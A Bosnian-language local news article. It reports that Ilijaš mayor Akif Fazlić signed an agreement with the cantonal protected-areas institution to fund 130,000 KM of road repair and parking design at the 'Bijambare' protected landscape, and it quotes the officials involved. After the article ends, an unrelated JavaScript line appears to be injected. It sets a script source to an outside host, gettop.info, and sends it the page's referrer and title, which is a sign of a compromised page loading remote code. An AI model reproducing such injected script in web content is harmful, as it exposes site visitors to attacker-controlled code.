Načelnik Akif Fazlić potpisao Sporazum o sufinansiranju Projekata na Zaštićenom području “Bijambare”

Sporazum o sufinansiranju projekta sanacije putne komunikacije na relaciji naplatna rampa – info punkt u dužini od 2 km, te izrade projektne dokumentacije za pomoćni parking prostor i autobuska stajališta na području Zaštićenog pejsaža “Bijambare”, potpisao je načelnik Akif Fazlić sa direktorom Kantonalne javne ustanove za zaštićena prirodna područja Osmanom Delićem. Sporazumom je definisano izvođenje radova na pomoćnom parking prostoru, iznos, način, rokovi i uslovi plaćanja. Za ove namjene obezbijeđeno je 130.000,00 KM.  Općinski načelnik Akif Fazlić istakao je zadovoljstvo saradnjom sa menadžmentom Kantonalne javne ustanove za zaštićena prirodna područja.

Stalnim aktivnostima obezbjeđujemo sredstva koja će se prije svega upotrijebiti za rekonstrukciju putne infrastrukture u okviru Zaštićenog područja “Bijambare”, za rekonstrukciju parkinga i stajališta sa magistralne ceste. Na taj način želimo unaprijediti sigurnosno-bezbijednosne uslove saobraćaja na potezu skretanja za Bijambare i riješiti izgradnju dijela parkinga kao i rekonstruisati komunikaciju kojom saobraća turistički voz. Kroz potpisani Sporazum obezbjeđuju se značajna sredstva i stvara se ambijent za druga ulaganja. Ima dosta ideja koje ćemo pokušat zajedno sa resornim Ministarstvom i Zavodom za planiranje razvoja Kantona Sarajevo definisati i kroz zajedničke aktivnosti ovaj prostor učiniti još atraktivnijim u smislu povećanja broja posjetilaca, što ima za cilj širenje pozitivnog imidža kako Općine Ilijaš tako i Kantona Sarajevo kao značajne turističke destinacije”, kazao je načelnik Fazlić.

Direktor Kantonalne javne ustanove za zaštićena prirodna područja Osman Delić, najavio je  nabavku novog turističkog voza većeg kapaciteta.

„Sve posjete Općini Ilijaš su na kvalitetnom nivou i za dobrobit Bijambara i okoliša. Mi evo već dvije godine pokušavamo da dio inicijalnih sredstava koja nam ostanu preko naših vlastitih prihoda sa Zaštićenog područja “Bijambare” da usmjerimo za razvoj istog. Prošle godine smo obezbijedili 80.000,00 KM i ove godine 50.000,00 KM. Također u okviru ovih sredstava  pokušat ćemo da jednim dijelom popravimo udarne rupe na trasi puta u kojem saobraća električni voz kao i da proširimo dio pomoćnog parkinga zbog malog kapaciteta sadašnjeg, jer imamo naročito vikendom problem sa parking mjestima“, kazao je direktor Delić.

Potpisivanju Sporazuma prisustvovali su i Ministar finansija Kantona Sarajevo Jasmin Halebić i direktor KJP “Sarajevo-šume” Nermin Demirović.

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;